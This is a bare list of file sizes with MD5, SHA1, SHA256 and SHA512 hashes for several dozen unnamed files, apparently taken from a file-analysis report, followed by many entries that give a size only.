SHA256c3869bea8544908e2b56171d8cad584bd70d6a81651ca5c7338bb9f67249500e
SHA512466d3399155a36f2ebc8908dba2838736a2effe4a337a3c49ff57afc59e3394f71c494daa70b02cb13461c3e89c6ad3889e6067a8938d29f832810d41f7d5826
-
Filesize
98KB
MD5b379695029df2c12418dbd3669ad764a
SHA1a3c3a8fbe318e50803072693f3fdd9037a08a9b6
SHA25638830f0be205f95b226243b8350cbe93f1ce3c614b3fff4b2abac5edc255ea24
SHA512a69fceb13ba282ceac8d98303a135667169f2ce9767eb785bc33c86f9bf2a1fef9327057c1fcf2c6c47b556f32a9d248beb0157f4a9df1a2ff022866e13a115c
-
Filesize
2KB
MD5f83eadd62ebc38724b64d65976ec3ab3
SHA185ec42e9f3139e7cc193f2530eabecd58ff32f83
SHA25636d13f69d5ca0b95b329d5c56eccc9994a44bbfa3f9338f8a6bcf5ee07a06f19
SHA51279e69cc28550ad10d5fea86317b67b9cdbf19b9bebb29af5c36e979a199730aaba33b57ee2c431eccac26a72099edeb6e8f181e4a29b12a36fe5ed0782ee9f8c
-
Filesize
106KB
MD5d4064b252b0764839d6933922f3abf12
SHA1d0385be526c736576de2d39826066b1226a7ca33
SHA256be87ec6560ffa2cb9b7356fcdfca8a1ed235a1292b97450389c7cb3317ffe8c4
SHA51207b38f9536528ac88997bb1038db8c495a92dbc4c12c01c7fb1efbb8ea442d04385d2884f7e46edd9d5a5666641f2538c38961a1b19762cc4308d270ce8612a3
-
Filesize
60KB
MD5b7f71b0089736eed230deb70344855d6
SHA1e7ff869f19de2bf2ad567740f6554001d1c53c3b
SHA256f398ca80ea9dfe132f692cead0274159aec2e29cd0aff0dca9ffd3b12a5791ec
SHA512ee8f4e438bed498c8c489bf322e6d60804b7509480e9ee10ad23471a591c868c19cc5e5526e703299fe2ab3d3ce36128235fa5fe0227dc0ffcbffbc4c8c9420a
-
Filesize
94KB
MD5d317b9294cb5cea60b48514e9ceda28d
SHA149ccd40d4d5dad3374ae1280de5840105eb6da66
SHA25631dbc9d062f05b671d1cb35d8a56e48845a3d7bebb44c93aa46a13666fed20b3
SHA5128d21b3fc52cb4f2935f50fd997a289f43ff22b4922416be1cbea8ae0fe7642d9b227b3d266f05bff96130caf278075f0cea2a71ea19745fda6c64e9ce5b7cbb0
-
Filesize
54KB
MD5c5c384ce07970e9ffa5cd5961d08bdc7
SHA157558298cffad4deb2cdcb006e6f8d0e777daf8b
SHA2560ee59d1cdbb167b40413100be5b330df0790ef5db3539831f329df54a711936e
SHA5124e6116aef781171b61cbfd30e32e7195779763c0a4c960c38bd758bfb3226ec4ed8d424ae94303e79071ea1a2528dc2251b7c7a75d7dedd60dfe8c9ab72a0679
-
Filesize
92KB
MD596c1576ea852a5e67ed19cd7aa36a96f
SHA1849aacebfe2fb5dd0df9a672f0d8399d0d860c75
SHA256e76855984d287fd06f9512adb4c6352ac92c2bbc5a889d74e5f7cb135c8d1e6a
SHA512ddcbc977100a6af693d347ffb4c3773b3a9e98f97798cff988a4da45f365259e90ffd1081fb4a9fc5c45cb6efcc7c31863594a3f102e89968bca263ee9c31682
-
Filesize
81KB
MD5aa5e37d82eca3b6ea6ac3ff75a19840c
SHA185f1768c4692eeec134a6f6c8db810417fee2c85
SHA2566088b5055e8db84b45d9f6f2ccc2f74f8fcfb80b7f8465ad577d917b8725eb4c
SHA51230d42ceac13472644c7b205668ffc60f44b805dedf0bc2236a1d6e356e2a084be7dea931528faac76ef5fe9c1595da5355022e24a73588d3c70fed900567cbc0
-
Filesize
90KB
MD5ecdd69755748e3ecd359f1f1e549885d
SHA148e6c224acc52bdd75ff3a168c8c15788e395f67
SHA256b0b5b0c7a99a5a146cf595de62e28f96ec727acfecc9de39231d6f8814de4cde
SHA5120206637551db8a6e67a86ffe42c9fac700df32584593094496b85800c96498d0319979fa680fdaafd5844f2ca3e5907b730fa82edd854c00e8b3d177d2f41e95
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
2.9MB
MD5b826dd92d78ea2526e465a34324ebeea
SHA1bf8a0093acfd2eb93c102e1a5745fb080575372e
SHA2567824b50acdd144764dac7445a4067b35cf0fef619e451045ab6c1f54f5653a5b
SHA5121ac4b731b9b31cabf3b1c43aee37206aee5326c8e786abe2ab38e031633b778f97f2d6545cf745c3066f3bd47b7aaf2ded2f9955475428100eaf271dd9aeef17
-
Filesize
14.0MB
MD5bcceccab13375513a6e8ab48e7b63496
SHA163d8a68cf562424d3fc3be1297d83f8247e24142
SHA256a6af95a209b2e652ed6766804b9b8ad6b6a68f2c610b8f14713cd40df0d62bf9
SHA512d94483deaae98bf9212699f1ab0bd913f6151a63e65ebc1ea644ab98d5e3ebd74ecaa08f70aca31e11a5d2c64d1504b723817af35bbe9d7b05c758dd6945d484
-
Filesize
11KB
MD525e8156b7f7ca8dad999ee2b93a32b71
SHA1db587e9e9559b433cee57435cb97a83963659430
SHA256ddf3ba4e25a622276755133e0cce5605b83719c7cab3546e09acbfed00d6a986
SHA5121211b2fa997ba13ff926aec58b6b35a81d7fe108b0caa8f4d6369d0a37f8481373b78a4b201651243adde9e2b2699ce929482a46226ff6299b0a0e40fe2ddc56
-
Filesize
502KB
MD5e690f995973164fe425f76589b1be2d9
SHA1e947c4dad203aab37a003194dddc7980c74fa712
SHA25687862f4bc8559fbe578389a9501dc01c4c585edb4bb03b238493327296d60171
SHA51277991110c1d195616e936d27151d02e4d957be6c20a4f3b3511567868b5ddffc6abbfdc668d17672f5d681f12b20237c7905f9b0daaa6d71dcdac4b38f2448b2
-
Filesize
717B
MD5d11554f2070948be89234c2a5a9715f6
SHA1ce56f02cefbbcb606ccf2002d72161b422345db5
SHA256f72fc4ad9515d9c181ed58bf1ea1507ed01f8a7fe964cb2c9aedf3d8583b790d
SHA512e45cd521e0aa3e2e979484ec2a27831eb68220ca31bd89b7fd42a4571d358aeb75be789c36e613fc1fde193710fab68e7798396c8ad023631d22eac02266cf73
-
Filesize
2.6MB
MD53fb0ad61548021bea60cdb1e1145ed2c
SHA1c9b1b765249bfd76573546e92287245127a06e47
SHA2565d1a788260891c317f9d05b3387e732af908959c5ad4f5a84e7984bee71084f1
SHA51238269c22fda1fdee5906c2bfdfc19b77b5f6d8da2be939c6d8259b536912f8bc6f261f5c508f47ade8ab591a54aafbfbcc302219820bad19feb78fcc3586d331
-
Filesize
17KB
MD5d7f250d28cb80f4597f6c22c62edb89b
SHA1c62efe908a1319a752a646eba1445e085381ed38
SHA2566b3a112f501763f5a46d6a19e12f76ed62138825726cae000126fc954ae9b9c0
SHA5122a65480a0241e9f40566dbd688c43ce49ff9d022dbfba77ecd31f69b95ef4968d3dd74b7e67a917f19e8877e5807e7e441fc69cb77c304cdc30b76500ee1ea15
-
Filesize
8KB
MD524dc3cef20903c8846c2461af1b57af2
SHA18aa38fa19014eda813eb0d1293b7e99539d52306
SHA256b6f63bf978825680dca81f8a82f391b45a5d2c38c19ebd44915699cb826e3b68
SHA512e1ee52f037580b0847bebc4a5dafc562a34f17a398d6a11e7b41bf280eb2300e7448b0e7cda1a67482aefca7cc00053b723bad876581729db25c8fb523bbfaab
-
Filesize
6KB
MD552bbb76f37f3775a71dea1117fdab85c
SHA170ac276d03bb14db24f3391594f07c5102864482
SHA256ebcb2c5ea71e86c476f1f9d2c212e84936bcb05323878988b71f67c5180518e7
SHA512d3fdca3f61d9ab597e2b7425b809f3f16ecdf6438cb6a15379eee2cc00618c3407dbab52cfc1235300ceed29364fe8b7beac3f4a1ebb77c0862c511def731583
-
Filesize
3KB
MD51f28aa8da853e6e7bcad58be686032ce
SHA1b613bc62f6200f6cafe372d447da92b75c76678a
SHA2560b48991d7f335279c7843359238321045385c106a9dda258ae1f90a98ffdc37a
SHA5122d42b7e1f9bab10692fc239068b6c2ea53268a99ba998849a47add78ca8a5f786e6f948d3e7f6659e03b4c2562a3af6ab7626d75c136c09575af7401652e1fb2
-
Filesize
1KB
MD534e4e910a49d4dccd01f5e74ab020482
SHA1f9e8ea9bb70b08aeab5ac36166cb3d3a42faf900
SHA256c7a12c9874bba39793fa82a4207bff1c80623c0c93d9f8bf9e7564b5fe1f288b
SHA51241cfd61fe0168f101d048328b5ac63c2ecc1e1ea3295f31bad23958c1807fd7ef2c46602f9486d8e1e40365c5792c35ccc84d41dd86a244267151696875ec80c
-
Filesize
886B
MD51ffc01f39a6210a7cd279b17f322420d
SHA1f2b14e5e3d21d5eb2fc1588c138271c1a79ed8ff
SHA256fae49538655328de8f875bced0962e9803cd6c5e6b7eec51ed3232d0b45e44da
SHA51247a3a4bdcae5a43534555412bf0921696877110045b3aa3d8000b8876f83fc5027f16c1ba7ed9ab60231bdf7a890a237154d5fe9d88df917057577f7f351f10c
-
Filesize
235B
MD5d5ce22e15c92818abb90c9e78c468731
SHA1ce3b365b7c87acb74407e65dda61aad4c9be826d
SHA2565f5625b74b5f19738699b34bffd021857655975fffe8d6ce4b0a7d6852c52b98
SHA512d1fee5e1635210b9b9b549d457d0296e514addadc40b76eb723d77e6d146a73dff63e8cb3765b827dfe9c7fa1c58509e86e504596637335f2aa8c9556821c80a
-
Filesize
883B
MD5e83123384cce95400a7071991ce40f5d
SHA133b2837d8ffb74b2487e360de92ec9af4eb96c4d
SHA25693f09877d6d41ea64f4086b3bcae56c76171236b0cfa3bdae70bf4c4664189b3
SHA512ed614a55f338c27e025e1256ffdf2b733ec520f51c70c6ebdd6c0610f44914ed383057b3c7e14df14129e3c2c265f775c16f93accf3959ec8827737a9f3e8dc8
-
Filesize
15KB
MD50695c95f62e6754b48d78d76d855780f
SHA15b6bcd2371a72bcf4df2e54f9da664f5c9b081a2
SHA2564c409cde539af2d84e91e231392921e4fcd74b2d4e70d6be702fecfb8f51516b
SHA51295655933c0500f53233b3dda0cbacfae4c348e7c8547651f08c693b226b8e084520a1c9e8eabc6bfaa23cb9fe8382f4d53c7ea1676aed5db1cfe29b0e2a02487
-
Filesize
2KB
MD559e0be05c0dce3f9d169a64c973fd894
SHA1f3ca5692446a502eb418979c10e1ff167f7c8966
SHA25671181c93f5fc675f0ca018c1ca7d8b3a6fa6579fde7b881fb5e747c1d7b18f30
SHA512be7726b62bdc27ad11d3b485698bab0b444991e1494a4f7afa8dd46c68b18f7837eddcb51cec659f05c3c4480c507262ec7daad471ccc43ffaa9016375879def
-
Filesize
235B
MD5fa5c5bb616bcc723d26e0d443e0eeb53
SHA1ce13b8ad97c4ddc09bd76a7cb64f07ab537cb1a7
SHA256974ae9709e3935b45ec63b2e44708f0300efc0a297feb41116074a660463c99a
SHA512645caba159274de4015511c9652476dd3a3146c8e20f7aa5bebefe4101d5c61b06d0403c51b39a1acf24deb6ae5245d2f9ddf5a176352df9f55fdb20b6764891
-
Filesize
16KB
MD52599cf22dc1f280d73cd3d76912d3a22
SHA1cad1606fae5fe5c494f2b6f9775f3a186a0c43ac
SHA256e846226dcdc4465283a963b928666255e4cc592ee382c100aaaaeab0a42ed0fc
SHA51208d637f8610559476c44e8c07b3fee34914eee35e526c3f60c2b07528bc93b811a11d074c2c40c8dd364011313358b18f047b91eed28371cc90e08cc496bac9c
-
Filesize
1.1MB
MD5626073e8dcf656ac4130e3283c51cbba
SHA17e3197e5792e34a67bfef9727ce1dd7dc151284c
SHA25637c005a7789747b412d6c0a6a4c30d15732da3d857b4f94b744be1a67231b651
SHA512eebdeef5e47aeadfeebdbab8625f4ec91e15c4c4e4db4be91ea41be4a3da1e1afeed305f6470e5d6b2a31c41cbfb5548b35a15fccd7896d3fde7cdf402d7a339
-
Filesize
116B
MD5ae29912407dfadf0d683982d4fb57293
SHA10542053f5a6ce07dc206f69230109be4a5e25775
SHA256fe7686a6281f0ab519c32c788ce0da0d01640425018dcffcfcb81105757f6fe6
SHA5126f9083152c02f93a900cb69b1ce879e0c0d69453f1046280ca549a0301ae7925facdda6329f7ccb61726addee78ba2fffc5ba3491a185f139f3155716caf0a8d
-
Filesize
1001B
MD532aeacedce82bafbcba8d1ade9e88d5a
SHA1a9b4858d2ae0b6595705634fd024f7e076426a24
SHA2564ed3c6389f6f7cd94db5cd0f870c34a296fc0de3b1e707fccf01645b455790ce
SHA51267dfe5632188714ec87f3c79dbe217a0ae4dfb784f3fac63affd20fef8b8ef1978c28b3bf7955f3daaf3004ac5316b1ffa964683b0676841bab4274c325c6e2b
-
Filesize
18.5MB
MD51b32d1ec35a7ead1671efc0782b7edf0
SHA18e3274b9f2938ff2252ed74779dd6322c601a0c8
SHA2563ed0dec36754402707c2ae4fbfa887fe3089945f6f7c1a8a3e6c1e64ad1c2648
SHA512ab452caa2a529b5bf3874c291f1ffb2a30d9ea43dae5df6a6995dde4bc3506648c749317f0d8e94c31214e62f18f855d933b6d0b6b44634b01e058d3c5fcb499
-
Filesize
8KB
MD57e6b0a9b7b244620f5429f89e18176d1
SHA1dfd8ecfc28ad70d917f3386818b4c2b22e6be4c2
SHA256f28bc94b83f3d2760301ea1e3b6fb744621c81e3b060341de634c0bf9cfea1ce
SHA5123f242084b0234027c56540bf7eaa0cd98b92d4d5323c69b85963ca07c7b6e4f4cef98a88068fdea30ebaf7de9e37413ceb3014be2c11cdf474f34f680b13e7bb
-
Filesize
6KB
MD553beaab111502afd1a103c2dbf291f73
SHA1d2cae2786f985887c32ffce65c314fbfd0cba2f9
SHA2563d7a653df50efbbb5d91d98a554ca7fa0473e8b9a51bc0d3e2dc4f1b5da2ea5d
SHA512e5addc42fc8f632688c20358d72b6988453f055abf8dbce65b7ebff238a839cde842957be1e026909687e40bc972406519abcee58e8eefa24fc393bebc3d2864
-
Filesize
6KB
MD59e0da2e2e9778f40cab15516d2a08215
SHA162d2560c0ba66cb90e853fc93387f8f39d86ee74
SHA256885ca35364db047e6c563b6137775da703bbb397ec811bf230c5b123b228e297
SHA512c5a47eba519997df151368ed67184b62782afd45d5c11b41315884a0c10b97f0dd137d1c696c635975ac8178d7e0562bc3c0194ad75664a601df489f7e6258a9
-
Filesize
1KB
MD51aab5d6218f97b4cfc9bff0f3dfb8a2e
SHA12ac8dab5a69a0acc9e5105b6eb28aaffb14f9486
SHA256bba77ec1c1f198c631adeb060bf8a821770f21875e834debc59167c79f554965
SHA51212bb67c599eb979a989c4f3cc2d9bdade3c488d1251185471194c2cb1abfbf5f01bb6c8a073207b83f443b4f3a5c76c2c398eae9f4eaf228f023239654da60db
-
Filesize
3.5MB
MD5b87b543fc77a7059163087ef113fc1b4
SHA1ac0cee86c397043eaeb3508b4b9fbce8180f90be
SHA25698e897de78243b68910e0af2d46170ef1b711177287f7456d0841978db6c5089
SHA512e60cd04e2c6e2b97775955e6908a4b8fc94815faf580baa46cf4f5106b36cbac58630ed36e6c276ae4c0a13ae323fcd065f5e4b3657a1730dd08cf0579d59957
-
Filesize
2KB
MD505faf8a625a9036b33ded60ff0922629
SHA188a123f77bfa66c2642b254963a2964a7f688179
SHA256baf5754905f5c2423b1b01065bfce6cae6b8691b899453fbb9c098bd677a9a7d
SHA5120f2bf1b7d7cc649f8edad335e2f914115f816e6364667e433768f9b3dc9d73e229a4eddffc5865cd05a3d3cd411517b6ef45c96bfbf72325e45a85f99269b943
-
Filesize
408KB
-
Filesize
408KB
-
Filesize
408KB
-
Filesize
408KB
-
Filesize
4.6MB
-
Filesize
4.6MB
-
Filesize
8KB
-
Filesize
452KB
-
Filesize
4.7MB
-
Filesize
4.7MB
-
Filesize
5.9MB
-
Filesize
4.7MB
-
Filesize
4.7MB
-
Filesize
4.7MB
-
Filesize
4.7MB
-
Filesize
4.7MB
-
Filesize
4.7MB
-
Filesize
4.7MB
-
Filesize
4.7MB
-
Filesize
4.7MB
-
Filesize
4.7MB
-
Filesize
184KB
-
Filesize
184KB
-
Filesize
184KB
-
Filesize
184KB
-
Filesize
184KB
-
Filesize
184KB
-
Filesize
112KB
-
Filesize
6.5MB
-
Filesize
6.5MB
-
Filesize
4.4MB
-
Filesize
4.4MB
-
Filesize
4.4MB
-
Filesize
4.4MB
-
Filesize
4.4MB
-
Filesize
304KB
-
Filesize
600KB
-
Filesize
3.3MB
-
Filesize
408KB
-
Filesize
408KB
-
Filesize
136KB
-
Filesize
8.8MB
-
Filesize
120KB
-
Filesize
5.6MB
-
Filesize
6.5MB
-
Filesize
6.2MB
-
Filesize
216KB
-
Filesize
136KB
-
Filesize
8.8MB
-
Filesize
104KB
-
Filesize
4.8MB
-
Filesize
4.8MB
-
Filesize
184KB
-
Filesize
184KB
-
Filesize
184KB
-
Filesize
184KB
-
Filesize
184KB
-
Filesize
4.7MB
-
Filesize
4.7MB
-
Filesize
4KB
-
Filesize
384KB
-
Filesize
72KB
-
Filesize
5.2MB
-
Filesize
240KB
-
Filesize
584KB
-
Filesize
1.8MB
-
Filesize
420KB
-
Filesize
292KB
-
Filesize
12KB
-
Filesize
2.5MB
-
Filesize
136KB
-
Filesize
13.9MB
-
Filesize
13.9MB
-
Filesize
7.1MB
-
Filesize
7.1MB
-
Filesize
4.7MB
-
Filesize
4.7MB
-
Filesize
4.7MB
-
Filesize
4.7MB
-
Filesize
4.6MB
-
Filesize
4.6MB